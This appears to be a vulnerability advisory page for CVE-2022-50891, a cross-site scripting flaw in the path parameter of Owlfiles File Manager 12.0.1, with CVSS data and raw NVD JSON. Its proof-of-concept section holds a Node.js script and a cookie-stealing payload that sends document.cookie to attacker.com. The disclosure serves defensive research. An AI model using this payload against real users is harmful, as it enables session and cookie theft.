Security Vulnerability Report
CVE-2022-50891 CVSS 5.0 MEDIUM

CVE-2022-50891

Published: 2026-01-13 23:15:51
Last Modified: 2026-02-02 16:16:16

Description

Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:skyjos:owlfiles:12.0.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:apple:tvos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:apple:visionos:-:*:*:*:*:*:*:* - NOT VULNERABLE
Owlfiles File Manager < 12.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2022-50891 PoC - XSS via path parameter in Owlfiles File Manager
// Target: http://localhost:PORT/download?path=<script>alert('XSS')</script>
// Target: http://localhost:PORT/list?path=<img src=x onerror=alert(document.cookie)>
//
// NOTE(review): as published, the whole listing was collapsed onto one line,
// which makes everything after the first `//` a comment; the layout below is
// the intended one and the tokens are unchanged.
const http = require('http');

/**
 * Sends one GET to `/download?path=<payload>` and reports whether the raw
 * payload string appears in the response body.
 *
 * The payload is URL-encoded for the query string but compared un-encoded
 * against the body, so "reflected: true" means the server decoded the query
 * value and echoed it back without HTML-escaping it. The script does not look
 * at the response Content-Type or at where in the body the string landed, so
 * a true result is evidence of unescaped reflection, not of script execution
 * in a browser. No request timeout is set; a server that never responds
 * leaves the process waiting.
 *
 * @param {string} targetHost - hostname passed to http.request
 * @param {number} targetPort - port passed to http.request
 * @param {string} xssPayload - string placed in the `path` query parameter
 * @returns {void} results are written to the console only
 */
function exploitXSS(targetHost, targetPort, xssPayload) {
  const options = {
    hostname: targetHost,
    port: targetPort,
    // Only the /download endpoint from the description is exercised here;
    // the /list endpoint named in the header comment is not requested.
    path: '/download?path=' + encodeURIComponent(xssPayload),
    method: 'GET'
  };
  const req = http.request(options, (res) => {
    let data = '';
    // Buffer chunks are coerced to string by `+=` (default utf8 decoding).
    res.on('data', (chunk) => { data += chunk; });
    res.on('end', () => {
      console.log('Response Status:', res.statusCode);
      // Substring match on the un-encoded payload (see JSDoc above).
      console.log('XSS Payload reflected in response:', data.includes(xssPayload));
    });
  });
  // Connection-level failures are logged; a non-2xx status is not treated as
  // an error and still goes through the reflection check.
  req.on('error', (e) => { console.error('Request error:', e.message); });
  req.end();
}

// Cookie stealing payload
// NOTE(review): the reflection check above only needs a distinctive marker
// string; the hard-coded external host in this payload plays no part in the
// check and, if the page is ever rendered, sends the viewer's cookies to a
// third party. Defensively, the fix on the server side is to HTML-escape (or
// reject) the `path` value before echoing it into any response.
const cookieStealPayload = '<script>fetch("http://attacker.com/steal?c="+document.cookie)</script>';
exploitXSS('localhost', 8080, cookieStealPayload);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50891", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:50.567", "lastModified": "2026-02-02T16:16:15.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Owlfiles File Manager 12.0.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the path parameter in HTTP server endpoints. Attackers can craft URLs targeting the download and list endpoints with embedded script tags to execute arbitrary JavaScript in users' browsers."}, {"lang": "es", "value": "Owlfiles File Manager 12.0.1 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar scripts maliciosos a través del parámetro 'path' en los puntos finales del servidor HTTP. Los atacantes pueden crear URLs dirigidas a los puntos finales de descarga y lista con etiquetas de script incrustadas para ejecutar JavaScript arbitrario en los navegadores de los usuarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:skyjos:owlfiles:12.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "1E81E20E-05BA-4886-8C8E-3BDE79306740"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": 
"cpe:2.3:o:apple:ipados:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8D54BB4-30FB-4886-B1DE-7316F11B674B"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5415705-33E5-46D5-8E4D-9EBADC8C5705"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:tvos:-:*:*:*:*:*:*:*", "matchCriteriaId": "2346B2F8-C1F3-41C8-BD78-615FC31E9D0F"}, {"vulnerable": false, "criteria": "cpe:2.3:o:apple:visionos:-:*:*:*:*:*:*:*", "matchCriteriaId": "653A9908-981E-4C56-B557-F8F9838B31E1"}]}]}], "references": [{"url": "https://apps.apple.com/us/app/owlfiles-file-manager/id510282524", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51036", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.skyjos.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vu ... (truncated)